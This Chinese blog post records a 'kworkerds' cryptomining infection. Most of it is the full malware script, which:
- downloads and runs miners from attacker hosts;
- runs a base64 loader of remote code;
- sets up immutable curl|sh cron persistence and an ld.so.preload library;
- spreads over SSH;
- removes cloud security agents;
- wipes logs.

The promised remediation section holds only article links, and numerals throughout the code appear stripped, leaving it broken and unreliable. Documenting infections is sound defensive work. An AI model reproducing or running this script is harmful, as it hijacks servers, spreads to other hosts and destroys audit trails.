昨天一朋友的公司服务器中了挖矿病毒,一起帮忙查看并做下记录。
 

病毒信息

名称:kworkerds

目录:/tmp/

关键点:文件 -i 属性
 
i :这个i可就很厉害了。它可以让一个文件“不能被删除、改名,设置连接也无法写入或添加据。” 对于系统安全性有相当大的 
帮助。只有root能设置此属性。
通常系统管理员有能力判断这个文件是否可以被删除。
参考 :chattr -i root 也没办法随意删除
 
执行chattr -i thisxxs去掉i属性
 
crontab -l

*/ * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh

##

病毒脚本

 
#!/bin/bash

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function b() {

pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg

rm -rf /tmp/qW3xT. /tmp/ddgs. /tmp/ddgs. /tmp/wnTKYg /tmp/2t3ik

ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "cranbery" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -

ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep /opt/yilu/mservice|awk '{print $2}'|xargs kill -

ps auxf|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -

ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -

p=$(ps auxf|grep -v grep|grep kworkerds|wc -l)

if [ ${p} -eq  ];then

    ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -

fi

}

function d() {

    ARCH=$(uname -i)

    if [ "$ARCH" == "x86_64" ]; then

        (curl -fsSL --connect-timeout  https://master.clminer.ru/1/1551434761x2728329064.jpg -o /tmp/kworkerds||wget https://master.clminer.ru/1/1551434761x2728329064.jpg -O /tmp/kworkerds) && chmod +x /tmp/kworkerds

        /tmp/kworkerds

    else

        mkdir -p /var/tmp

        chmod  /var/tmp

        (curl -fsSL --connect-timeout  https://master.clminer.ru/2/1551434778x2728329032.jpg -o /var/tmp/kworkerds||wget https://master.clminer.ru/2/1551434778x2728329032.jpg -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds

        /var/tmp/kworkerds

    fi

}

function e() {

    nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cDovLzE4NS4xMC42OC45MS9yYXcvOThzZGY2OTEnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBleGVjKHBhZ2UpCmV4Y2VwdDoKICAgIHBhc3M='))" >/dev/null >& &

    touch /tmp/.38t9guft0055d0565u444gtjr0

}

function c() {

    chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload

    (curl -fsSL --connect-timeout  http://185.10.68.91/2/2 -o /usr/local/bin/dns||wget http://185.10.68.91/2/2 -O /usr/local/bin/dns) && chmod 755 /usr/local/bin/dns && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns

    echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab

    echo -e "*/10 * * * * root (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root

    echo -e "*/17 * * * * root (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache

    echo -e "*/23 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root

    mkdir -p /var/spool/cron/crontabs

    echo -e "*/31 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root

    mkdir -p /etc/cron.hourly

    (curl -fsSL --connect-timeout  http://185.10.68.91/1/1 -o /etc/cron.hourly/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner

    mkdir -p /etc/cron.daily

    (curl -fsSL --connect-timeout  http://185.10.68.91/1/1 -o /etc/cron.daily/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner

    mkdir -p /etc/cron.monthly

    (curl -fsSL --connect-timeout  http://185.10.68.91/1/1 -o /etc/cron.monthly/oanacroner||wget http://185.10.68.91/1/1 -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner

    mkdir -p /usr/local/lib/

    if [ ! -f "/usr/local/lib/libntpd.so" ]; then

        ARCH=$(uname -i)

        if [ "$ARCH" == "x86_64" ]; then

            (curl -fsSL --connect-timeout  https://master.clminer.ru/One/2 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/2 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so

        elif [ "$ARCH" == "i386" ]; then

            (curl -fsSL --connect-timeout  https://master.clminer.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so

        else

            (curl -fsSL --connect-timeout  https://master.clminer.ru/One/22 -o /usr/local/lib/libntpd.so||wget https://master.clminer.ru/One/22 -O /usr/local/lib/libntpd.so) && chmod 755 /usr/local/lib/libntpd.so && touch -acmr /bin/sh /usr/local/lib/libntpd.so && chattr +i /usr/local/lib/libntpd.so

        fi

    fi

    chattr -i /etc/ld.so.preload && echo /usr/local/lib/libntpd.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload

    if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then

          for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout= -oStrictHostKeyChecking=no $h '(curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh' & done

    fi

    touch -acmr /bin/sh /etc/cron.hourly/oanacroner

    touch -acmr /bin/sh /etc/cron.daily/oanacroner

    touch -acmr /bin/sh /etc/cron.monthly/oanacroner

}

function a() {

    if ps aux | grep -i '[a]liyun'; then

        wget http://update.aegis.aliyun.com/download/uninstall.sh

        chmod +x uninstall.sh

        ./uninstall.sh

        wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh

        chmod +x quartz_uninstall.sh

        ./quartz_uninstall.sh

        rm -f uninstall.sh     quartz_uninstall.sh

        pkill aliyun-service

        rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service

        rm -rf /usr/local/aegis*;

    elif ps aux | grep -i '[y]unjing'; then

        /usr/local/qcloud/stargate/admin/uninstall.sh

        /usr/local/qcloud/YunJing/uninst.sh

        /usr/local/qcloud/monitor/barad/admin/uninstall.sh

    fi

    touch /tmp/.a

}

mkdir -p /tmp

chmod  /tmp

if [ ! -f "/tmp/.a" ]; then

    a

fi

b

c

port=$(netstat -an | grep : | wc -l)

if [ ${port} -eq  ];then

    d

fi

if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then

    e

fi

echo >/var/spool/mail/root

echo >/var/log/wtmp

echo >/var/log/secure

echo >/var/log/cron
 

处理参考

kworkerds挖矿木马的更多相关文章

  1. kworkerds 挖矿木马简单分析及清理

    公司之前的开发和测试环境是在腾讯云上,部分服务器中过一次挖矿木马 kworkerds,本文为我当时分析和清理木马的记录,希望能对大家有所帮助. 现象 top 命令查看,显示 CPU 占用 100%,进 ...

  2. 云服务器ECS挖矿木马病毒处理和解决方案

    云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因,导致一些云服务器ECS中了挖矿病毒的坑. 总结了一些解决挖矿病毒的一些思路.由于病毒更新速度快仅供参考. 1.查看cpu爆满 ...

  3. Mac下一款门罗币挖矿木马的简要分析

    背景 最近在应急中发现了一款Mac上的挖矿木马,目标是挖门罗币,经过走访,受害用户都有从苹果电脑上安装第三方dmg的经历(其中可以确定一款LOL Mac私服安装app会导致该木马),怀疑在网上很多第三 ...

  4. 威胁快报|Nexus Repository Manager 3新漏洞已被用于挖矿木马传播,建议用户尽快修复

    背景 近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件. 值得注意的是, ...

  5. 威胁快报|首爆,新披露Jenkins RCE漏洞成ImposterMiner挖矿木马新“跳板”

    简介 阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行攻击的挖矿事件.除挖矿外,攻击者还曾植入具有C&C功能的tsunami木马,也预留了反弹shell的功能,给用户带来极大安全隐 ...

  6. 记一次Xmrig挖矿木马排查过程

    问题现象 Linux 服务器收到报警信息,主机 CPU 跑满. 自动创建运行 Docker 容器 xmrig, 导致其他运行中容器被迫停止. 问题原因 通过 top 命令可以看到有一个 xmrig 进 ...

  7. confluence 挖矿木马应急响应

    最近遇到一台confluence wiki主机被挖矿,收到CPU 告警异常之后,登录查看,进行分析. top c 命令查看,果然CPU 已经资源已经被吃完了.. 看到用户是confluence,100 ...

  8. 记一次服务器被植入挖矿木马cpu飙升200%解决过程

    线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序.突然一则噩耗从前线传来:网站不能访问了. 此项目是我负责,我以150+的手速立即打开了服务器 ...

  9. Linux的挖矿木马病毒清除(kswapd0进程)

    1.top查看资源使用情况 看到这些进程一直在变化,但是,主要是由于kswapd0进程在作怪,占据了99%以上的CUP,查找资料后,发现它就是挖矿进程 2.排查kswapd0进程 执行命令netsta ...

随机推荐

  1. SpringBoot +Vue 前后端分离实例

    今天下了Vue,想试一试前后端分离的实现,没想到坑还不少,这里就记录一下我遇到的坑和我的代码: 一.Vue的下载安装:从网上找就好了,没什么问题,除了下载以后,要把镜像库改成淘宝的,要不然太慢了. 二 ...

  2. Spring 基于 Java 的配置

    前面已经学习如何使用 XML 配置文件来配置 Spring bean. 基于 Java 的配置可以达到基于XML配置的相同效果. 基于 Java 的配置选项,可以使你在不用配置 XML 的情况下编写大 ...

  3. poj 2296

    Map Labeler Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 2047   Accepted: 682 Descri ...

  4. springboot中yml常用配置

    server: port: 8080 spring: datasource: #数据源配置 driver-class-name: com.mysql.cj.jdbc.Driver url: jdbc: ...

  5. ubuntu 安装 swftoos

    一:下载依赖: freetype下载地址 : http://ftp.twaren.net/Unix/NonGNU/freetype/ jpegsrc:下载地址 http://www.ijg.org/f ...

  6. [ES6系列-01]Class:面向对象的“新仇旧恨”

    [原创]CoderPower 大家好,这里是码路工人有力量,我是码路工人,你们是力量. 这是公众号(码路工人有力量)开通后的第二篇,写得还是有待改进吧.这次准备写一个关于ES6基础的短文系列,努力尽快 ...

  7. [PHP学习教程 - 日期/时间]001.月份第一天&最后一天(Month First Day & Last Day)

    引言:在时间处理上,对于前/后台人性化的展示当前月份最大天数,这个是网站必须要处理的一个方面.但通常这一块会由第三方类库直接包装,这里我们做一个简单的Mark. 今天,我们就为大家提供一个函数,获得指 ...

  8. [SD心灵鸡汤]004.每月一则 - 2015.08

    1.事常与人违,事总在人为. 2.骏马是跑出来的,强兵是打出来的. 3.驾驭命运的舵是奋斗.不抱有一丝幻想,不放弃一点机会,不停止一日努力. 4.如果惧怕前面跌宕的山岩,生命就永远只能是死水一潭. 5 ...

  9. html5学习之路_004

    HTML表单 表单用于获取不同类型的用户输入 常用表单标签 下面为一个简单的表单: <!DOCTYPE html> <html> <head lang="en& ...

  10. Python 每日一练 | Flask 实现半成品留言板

    留言板Flask实现 引言 看了几天网上的代码,终于写出来一个半成品的Flask的留言板项目,为什么说是半成品呢?因为没能实现留言板那种及时评论刷新的效果,可能还是在重定向上有问题 或者渲染写的存在问 ...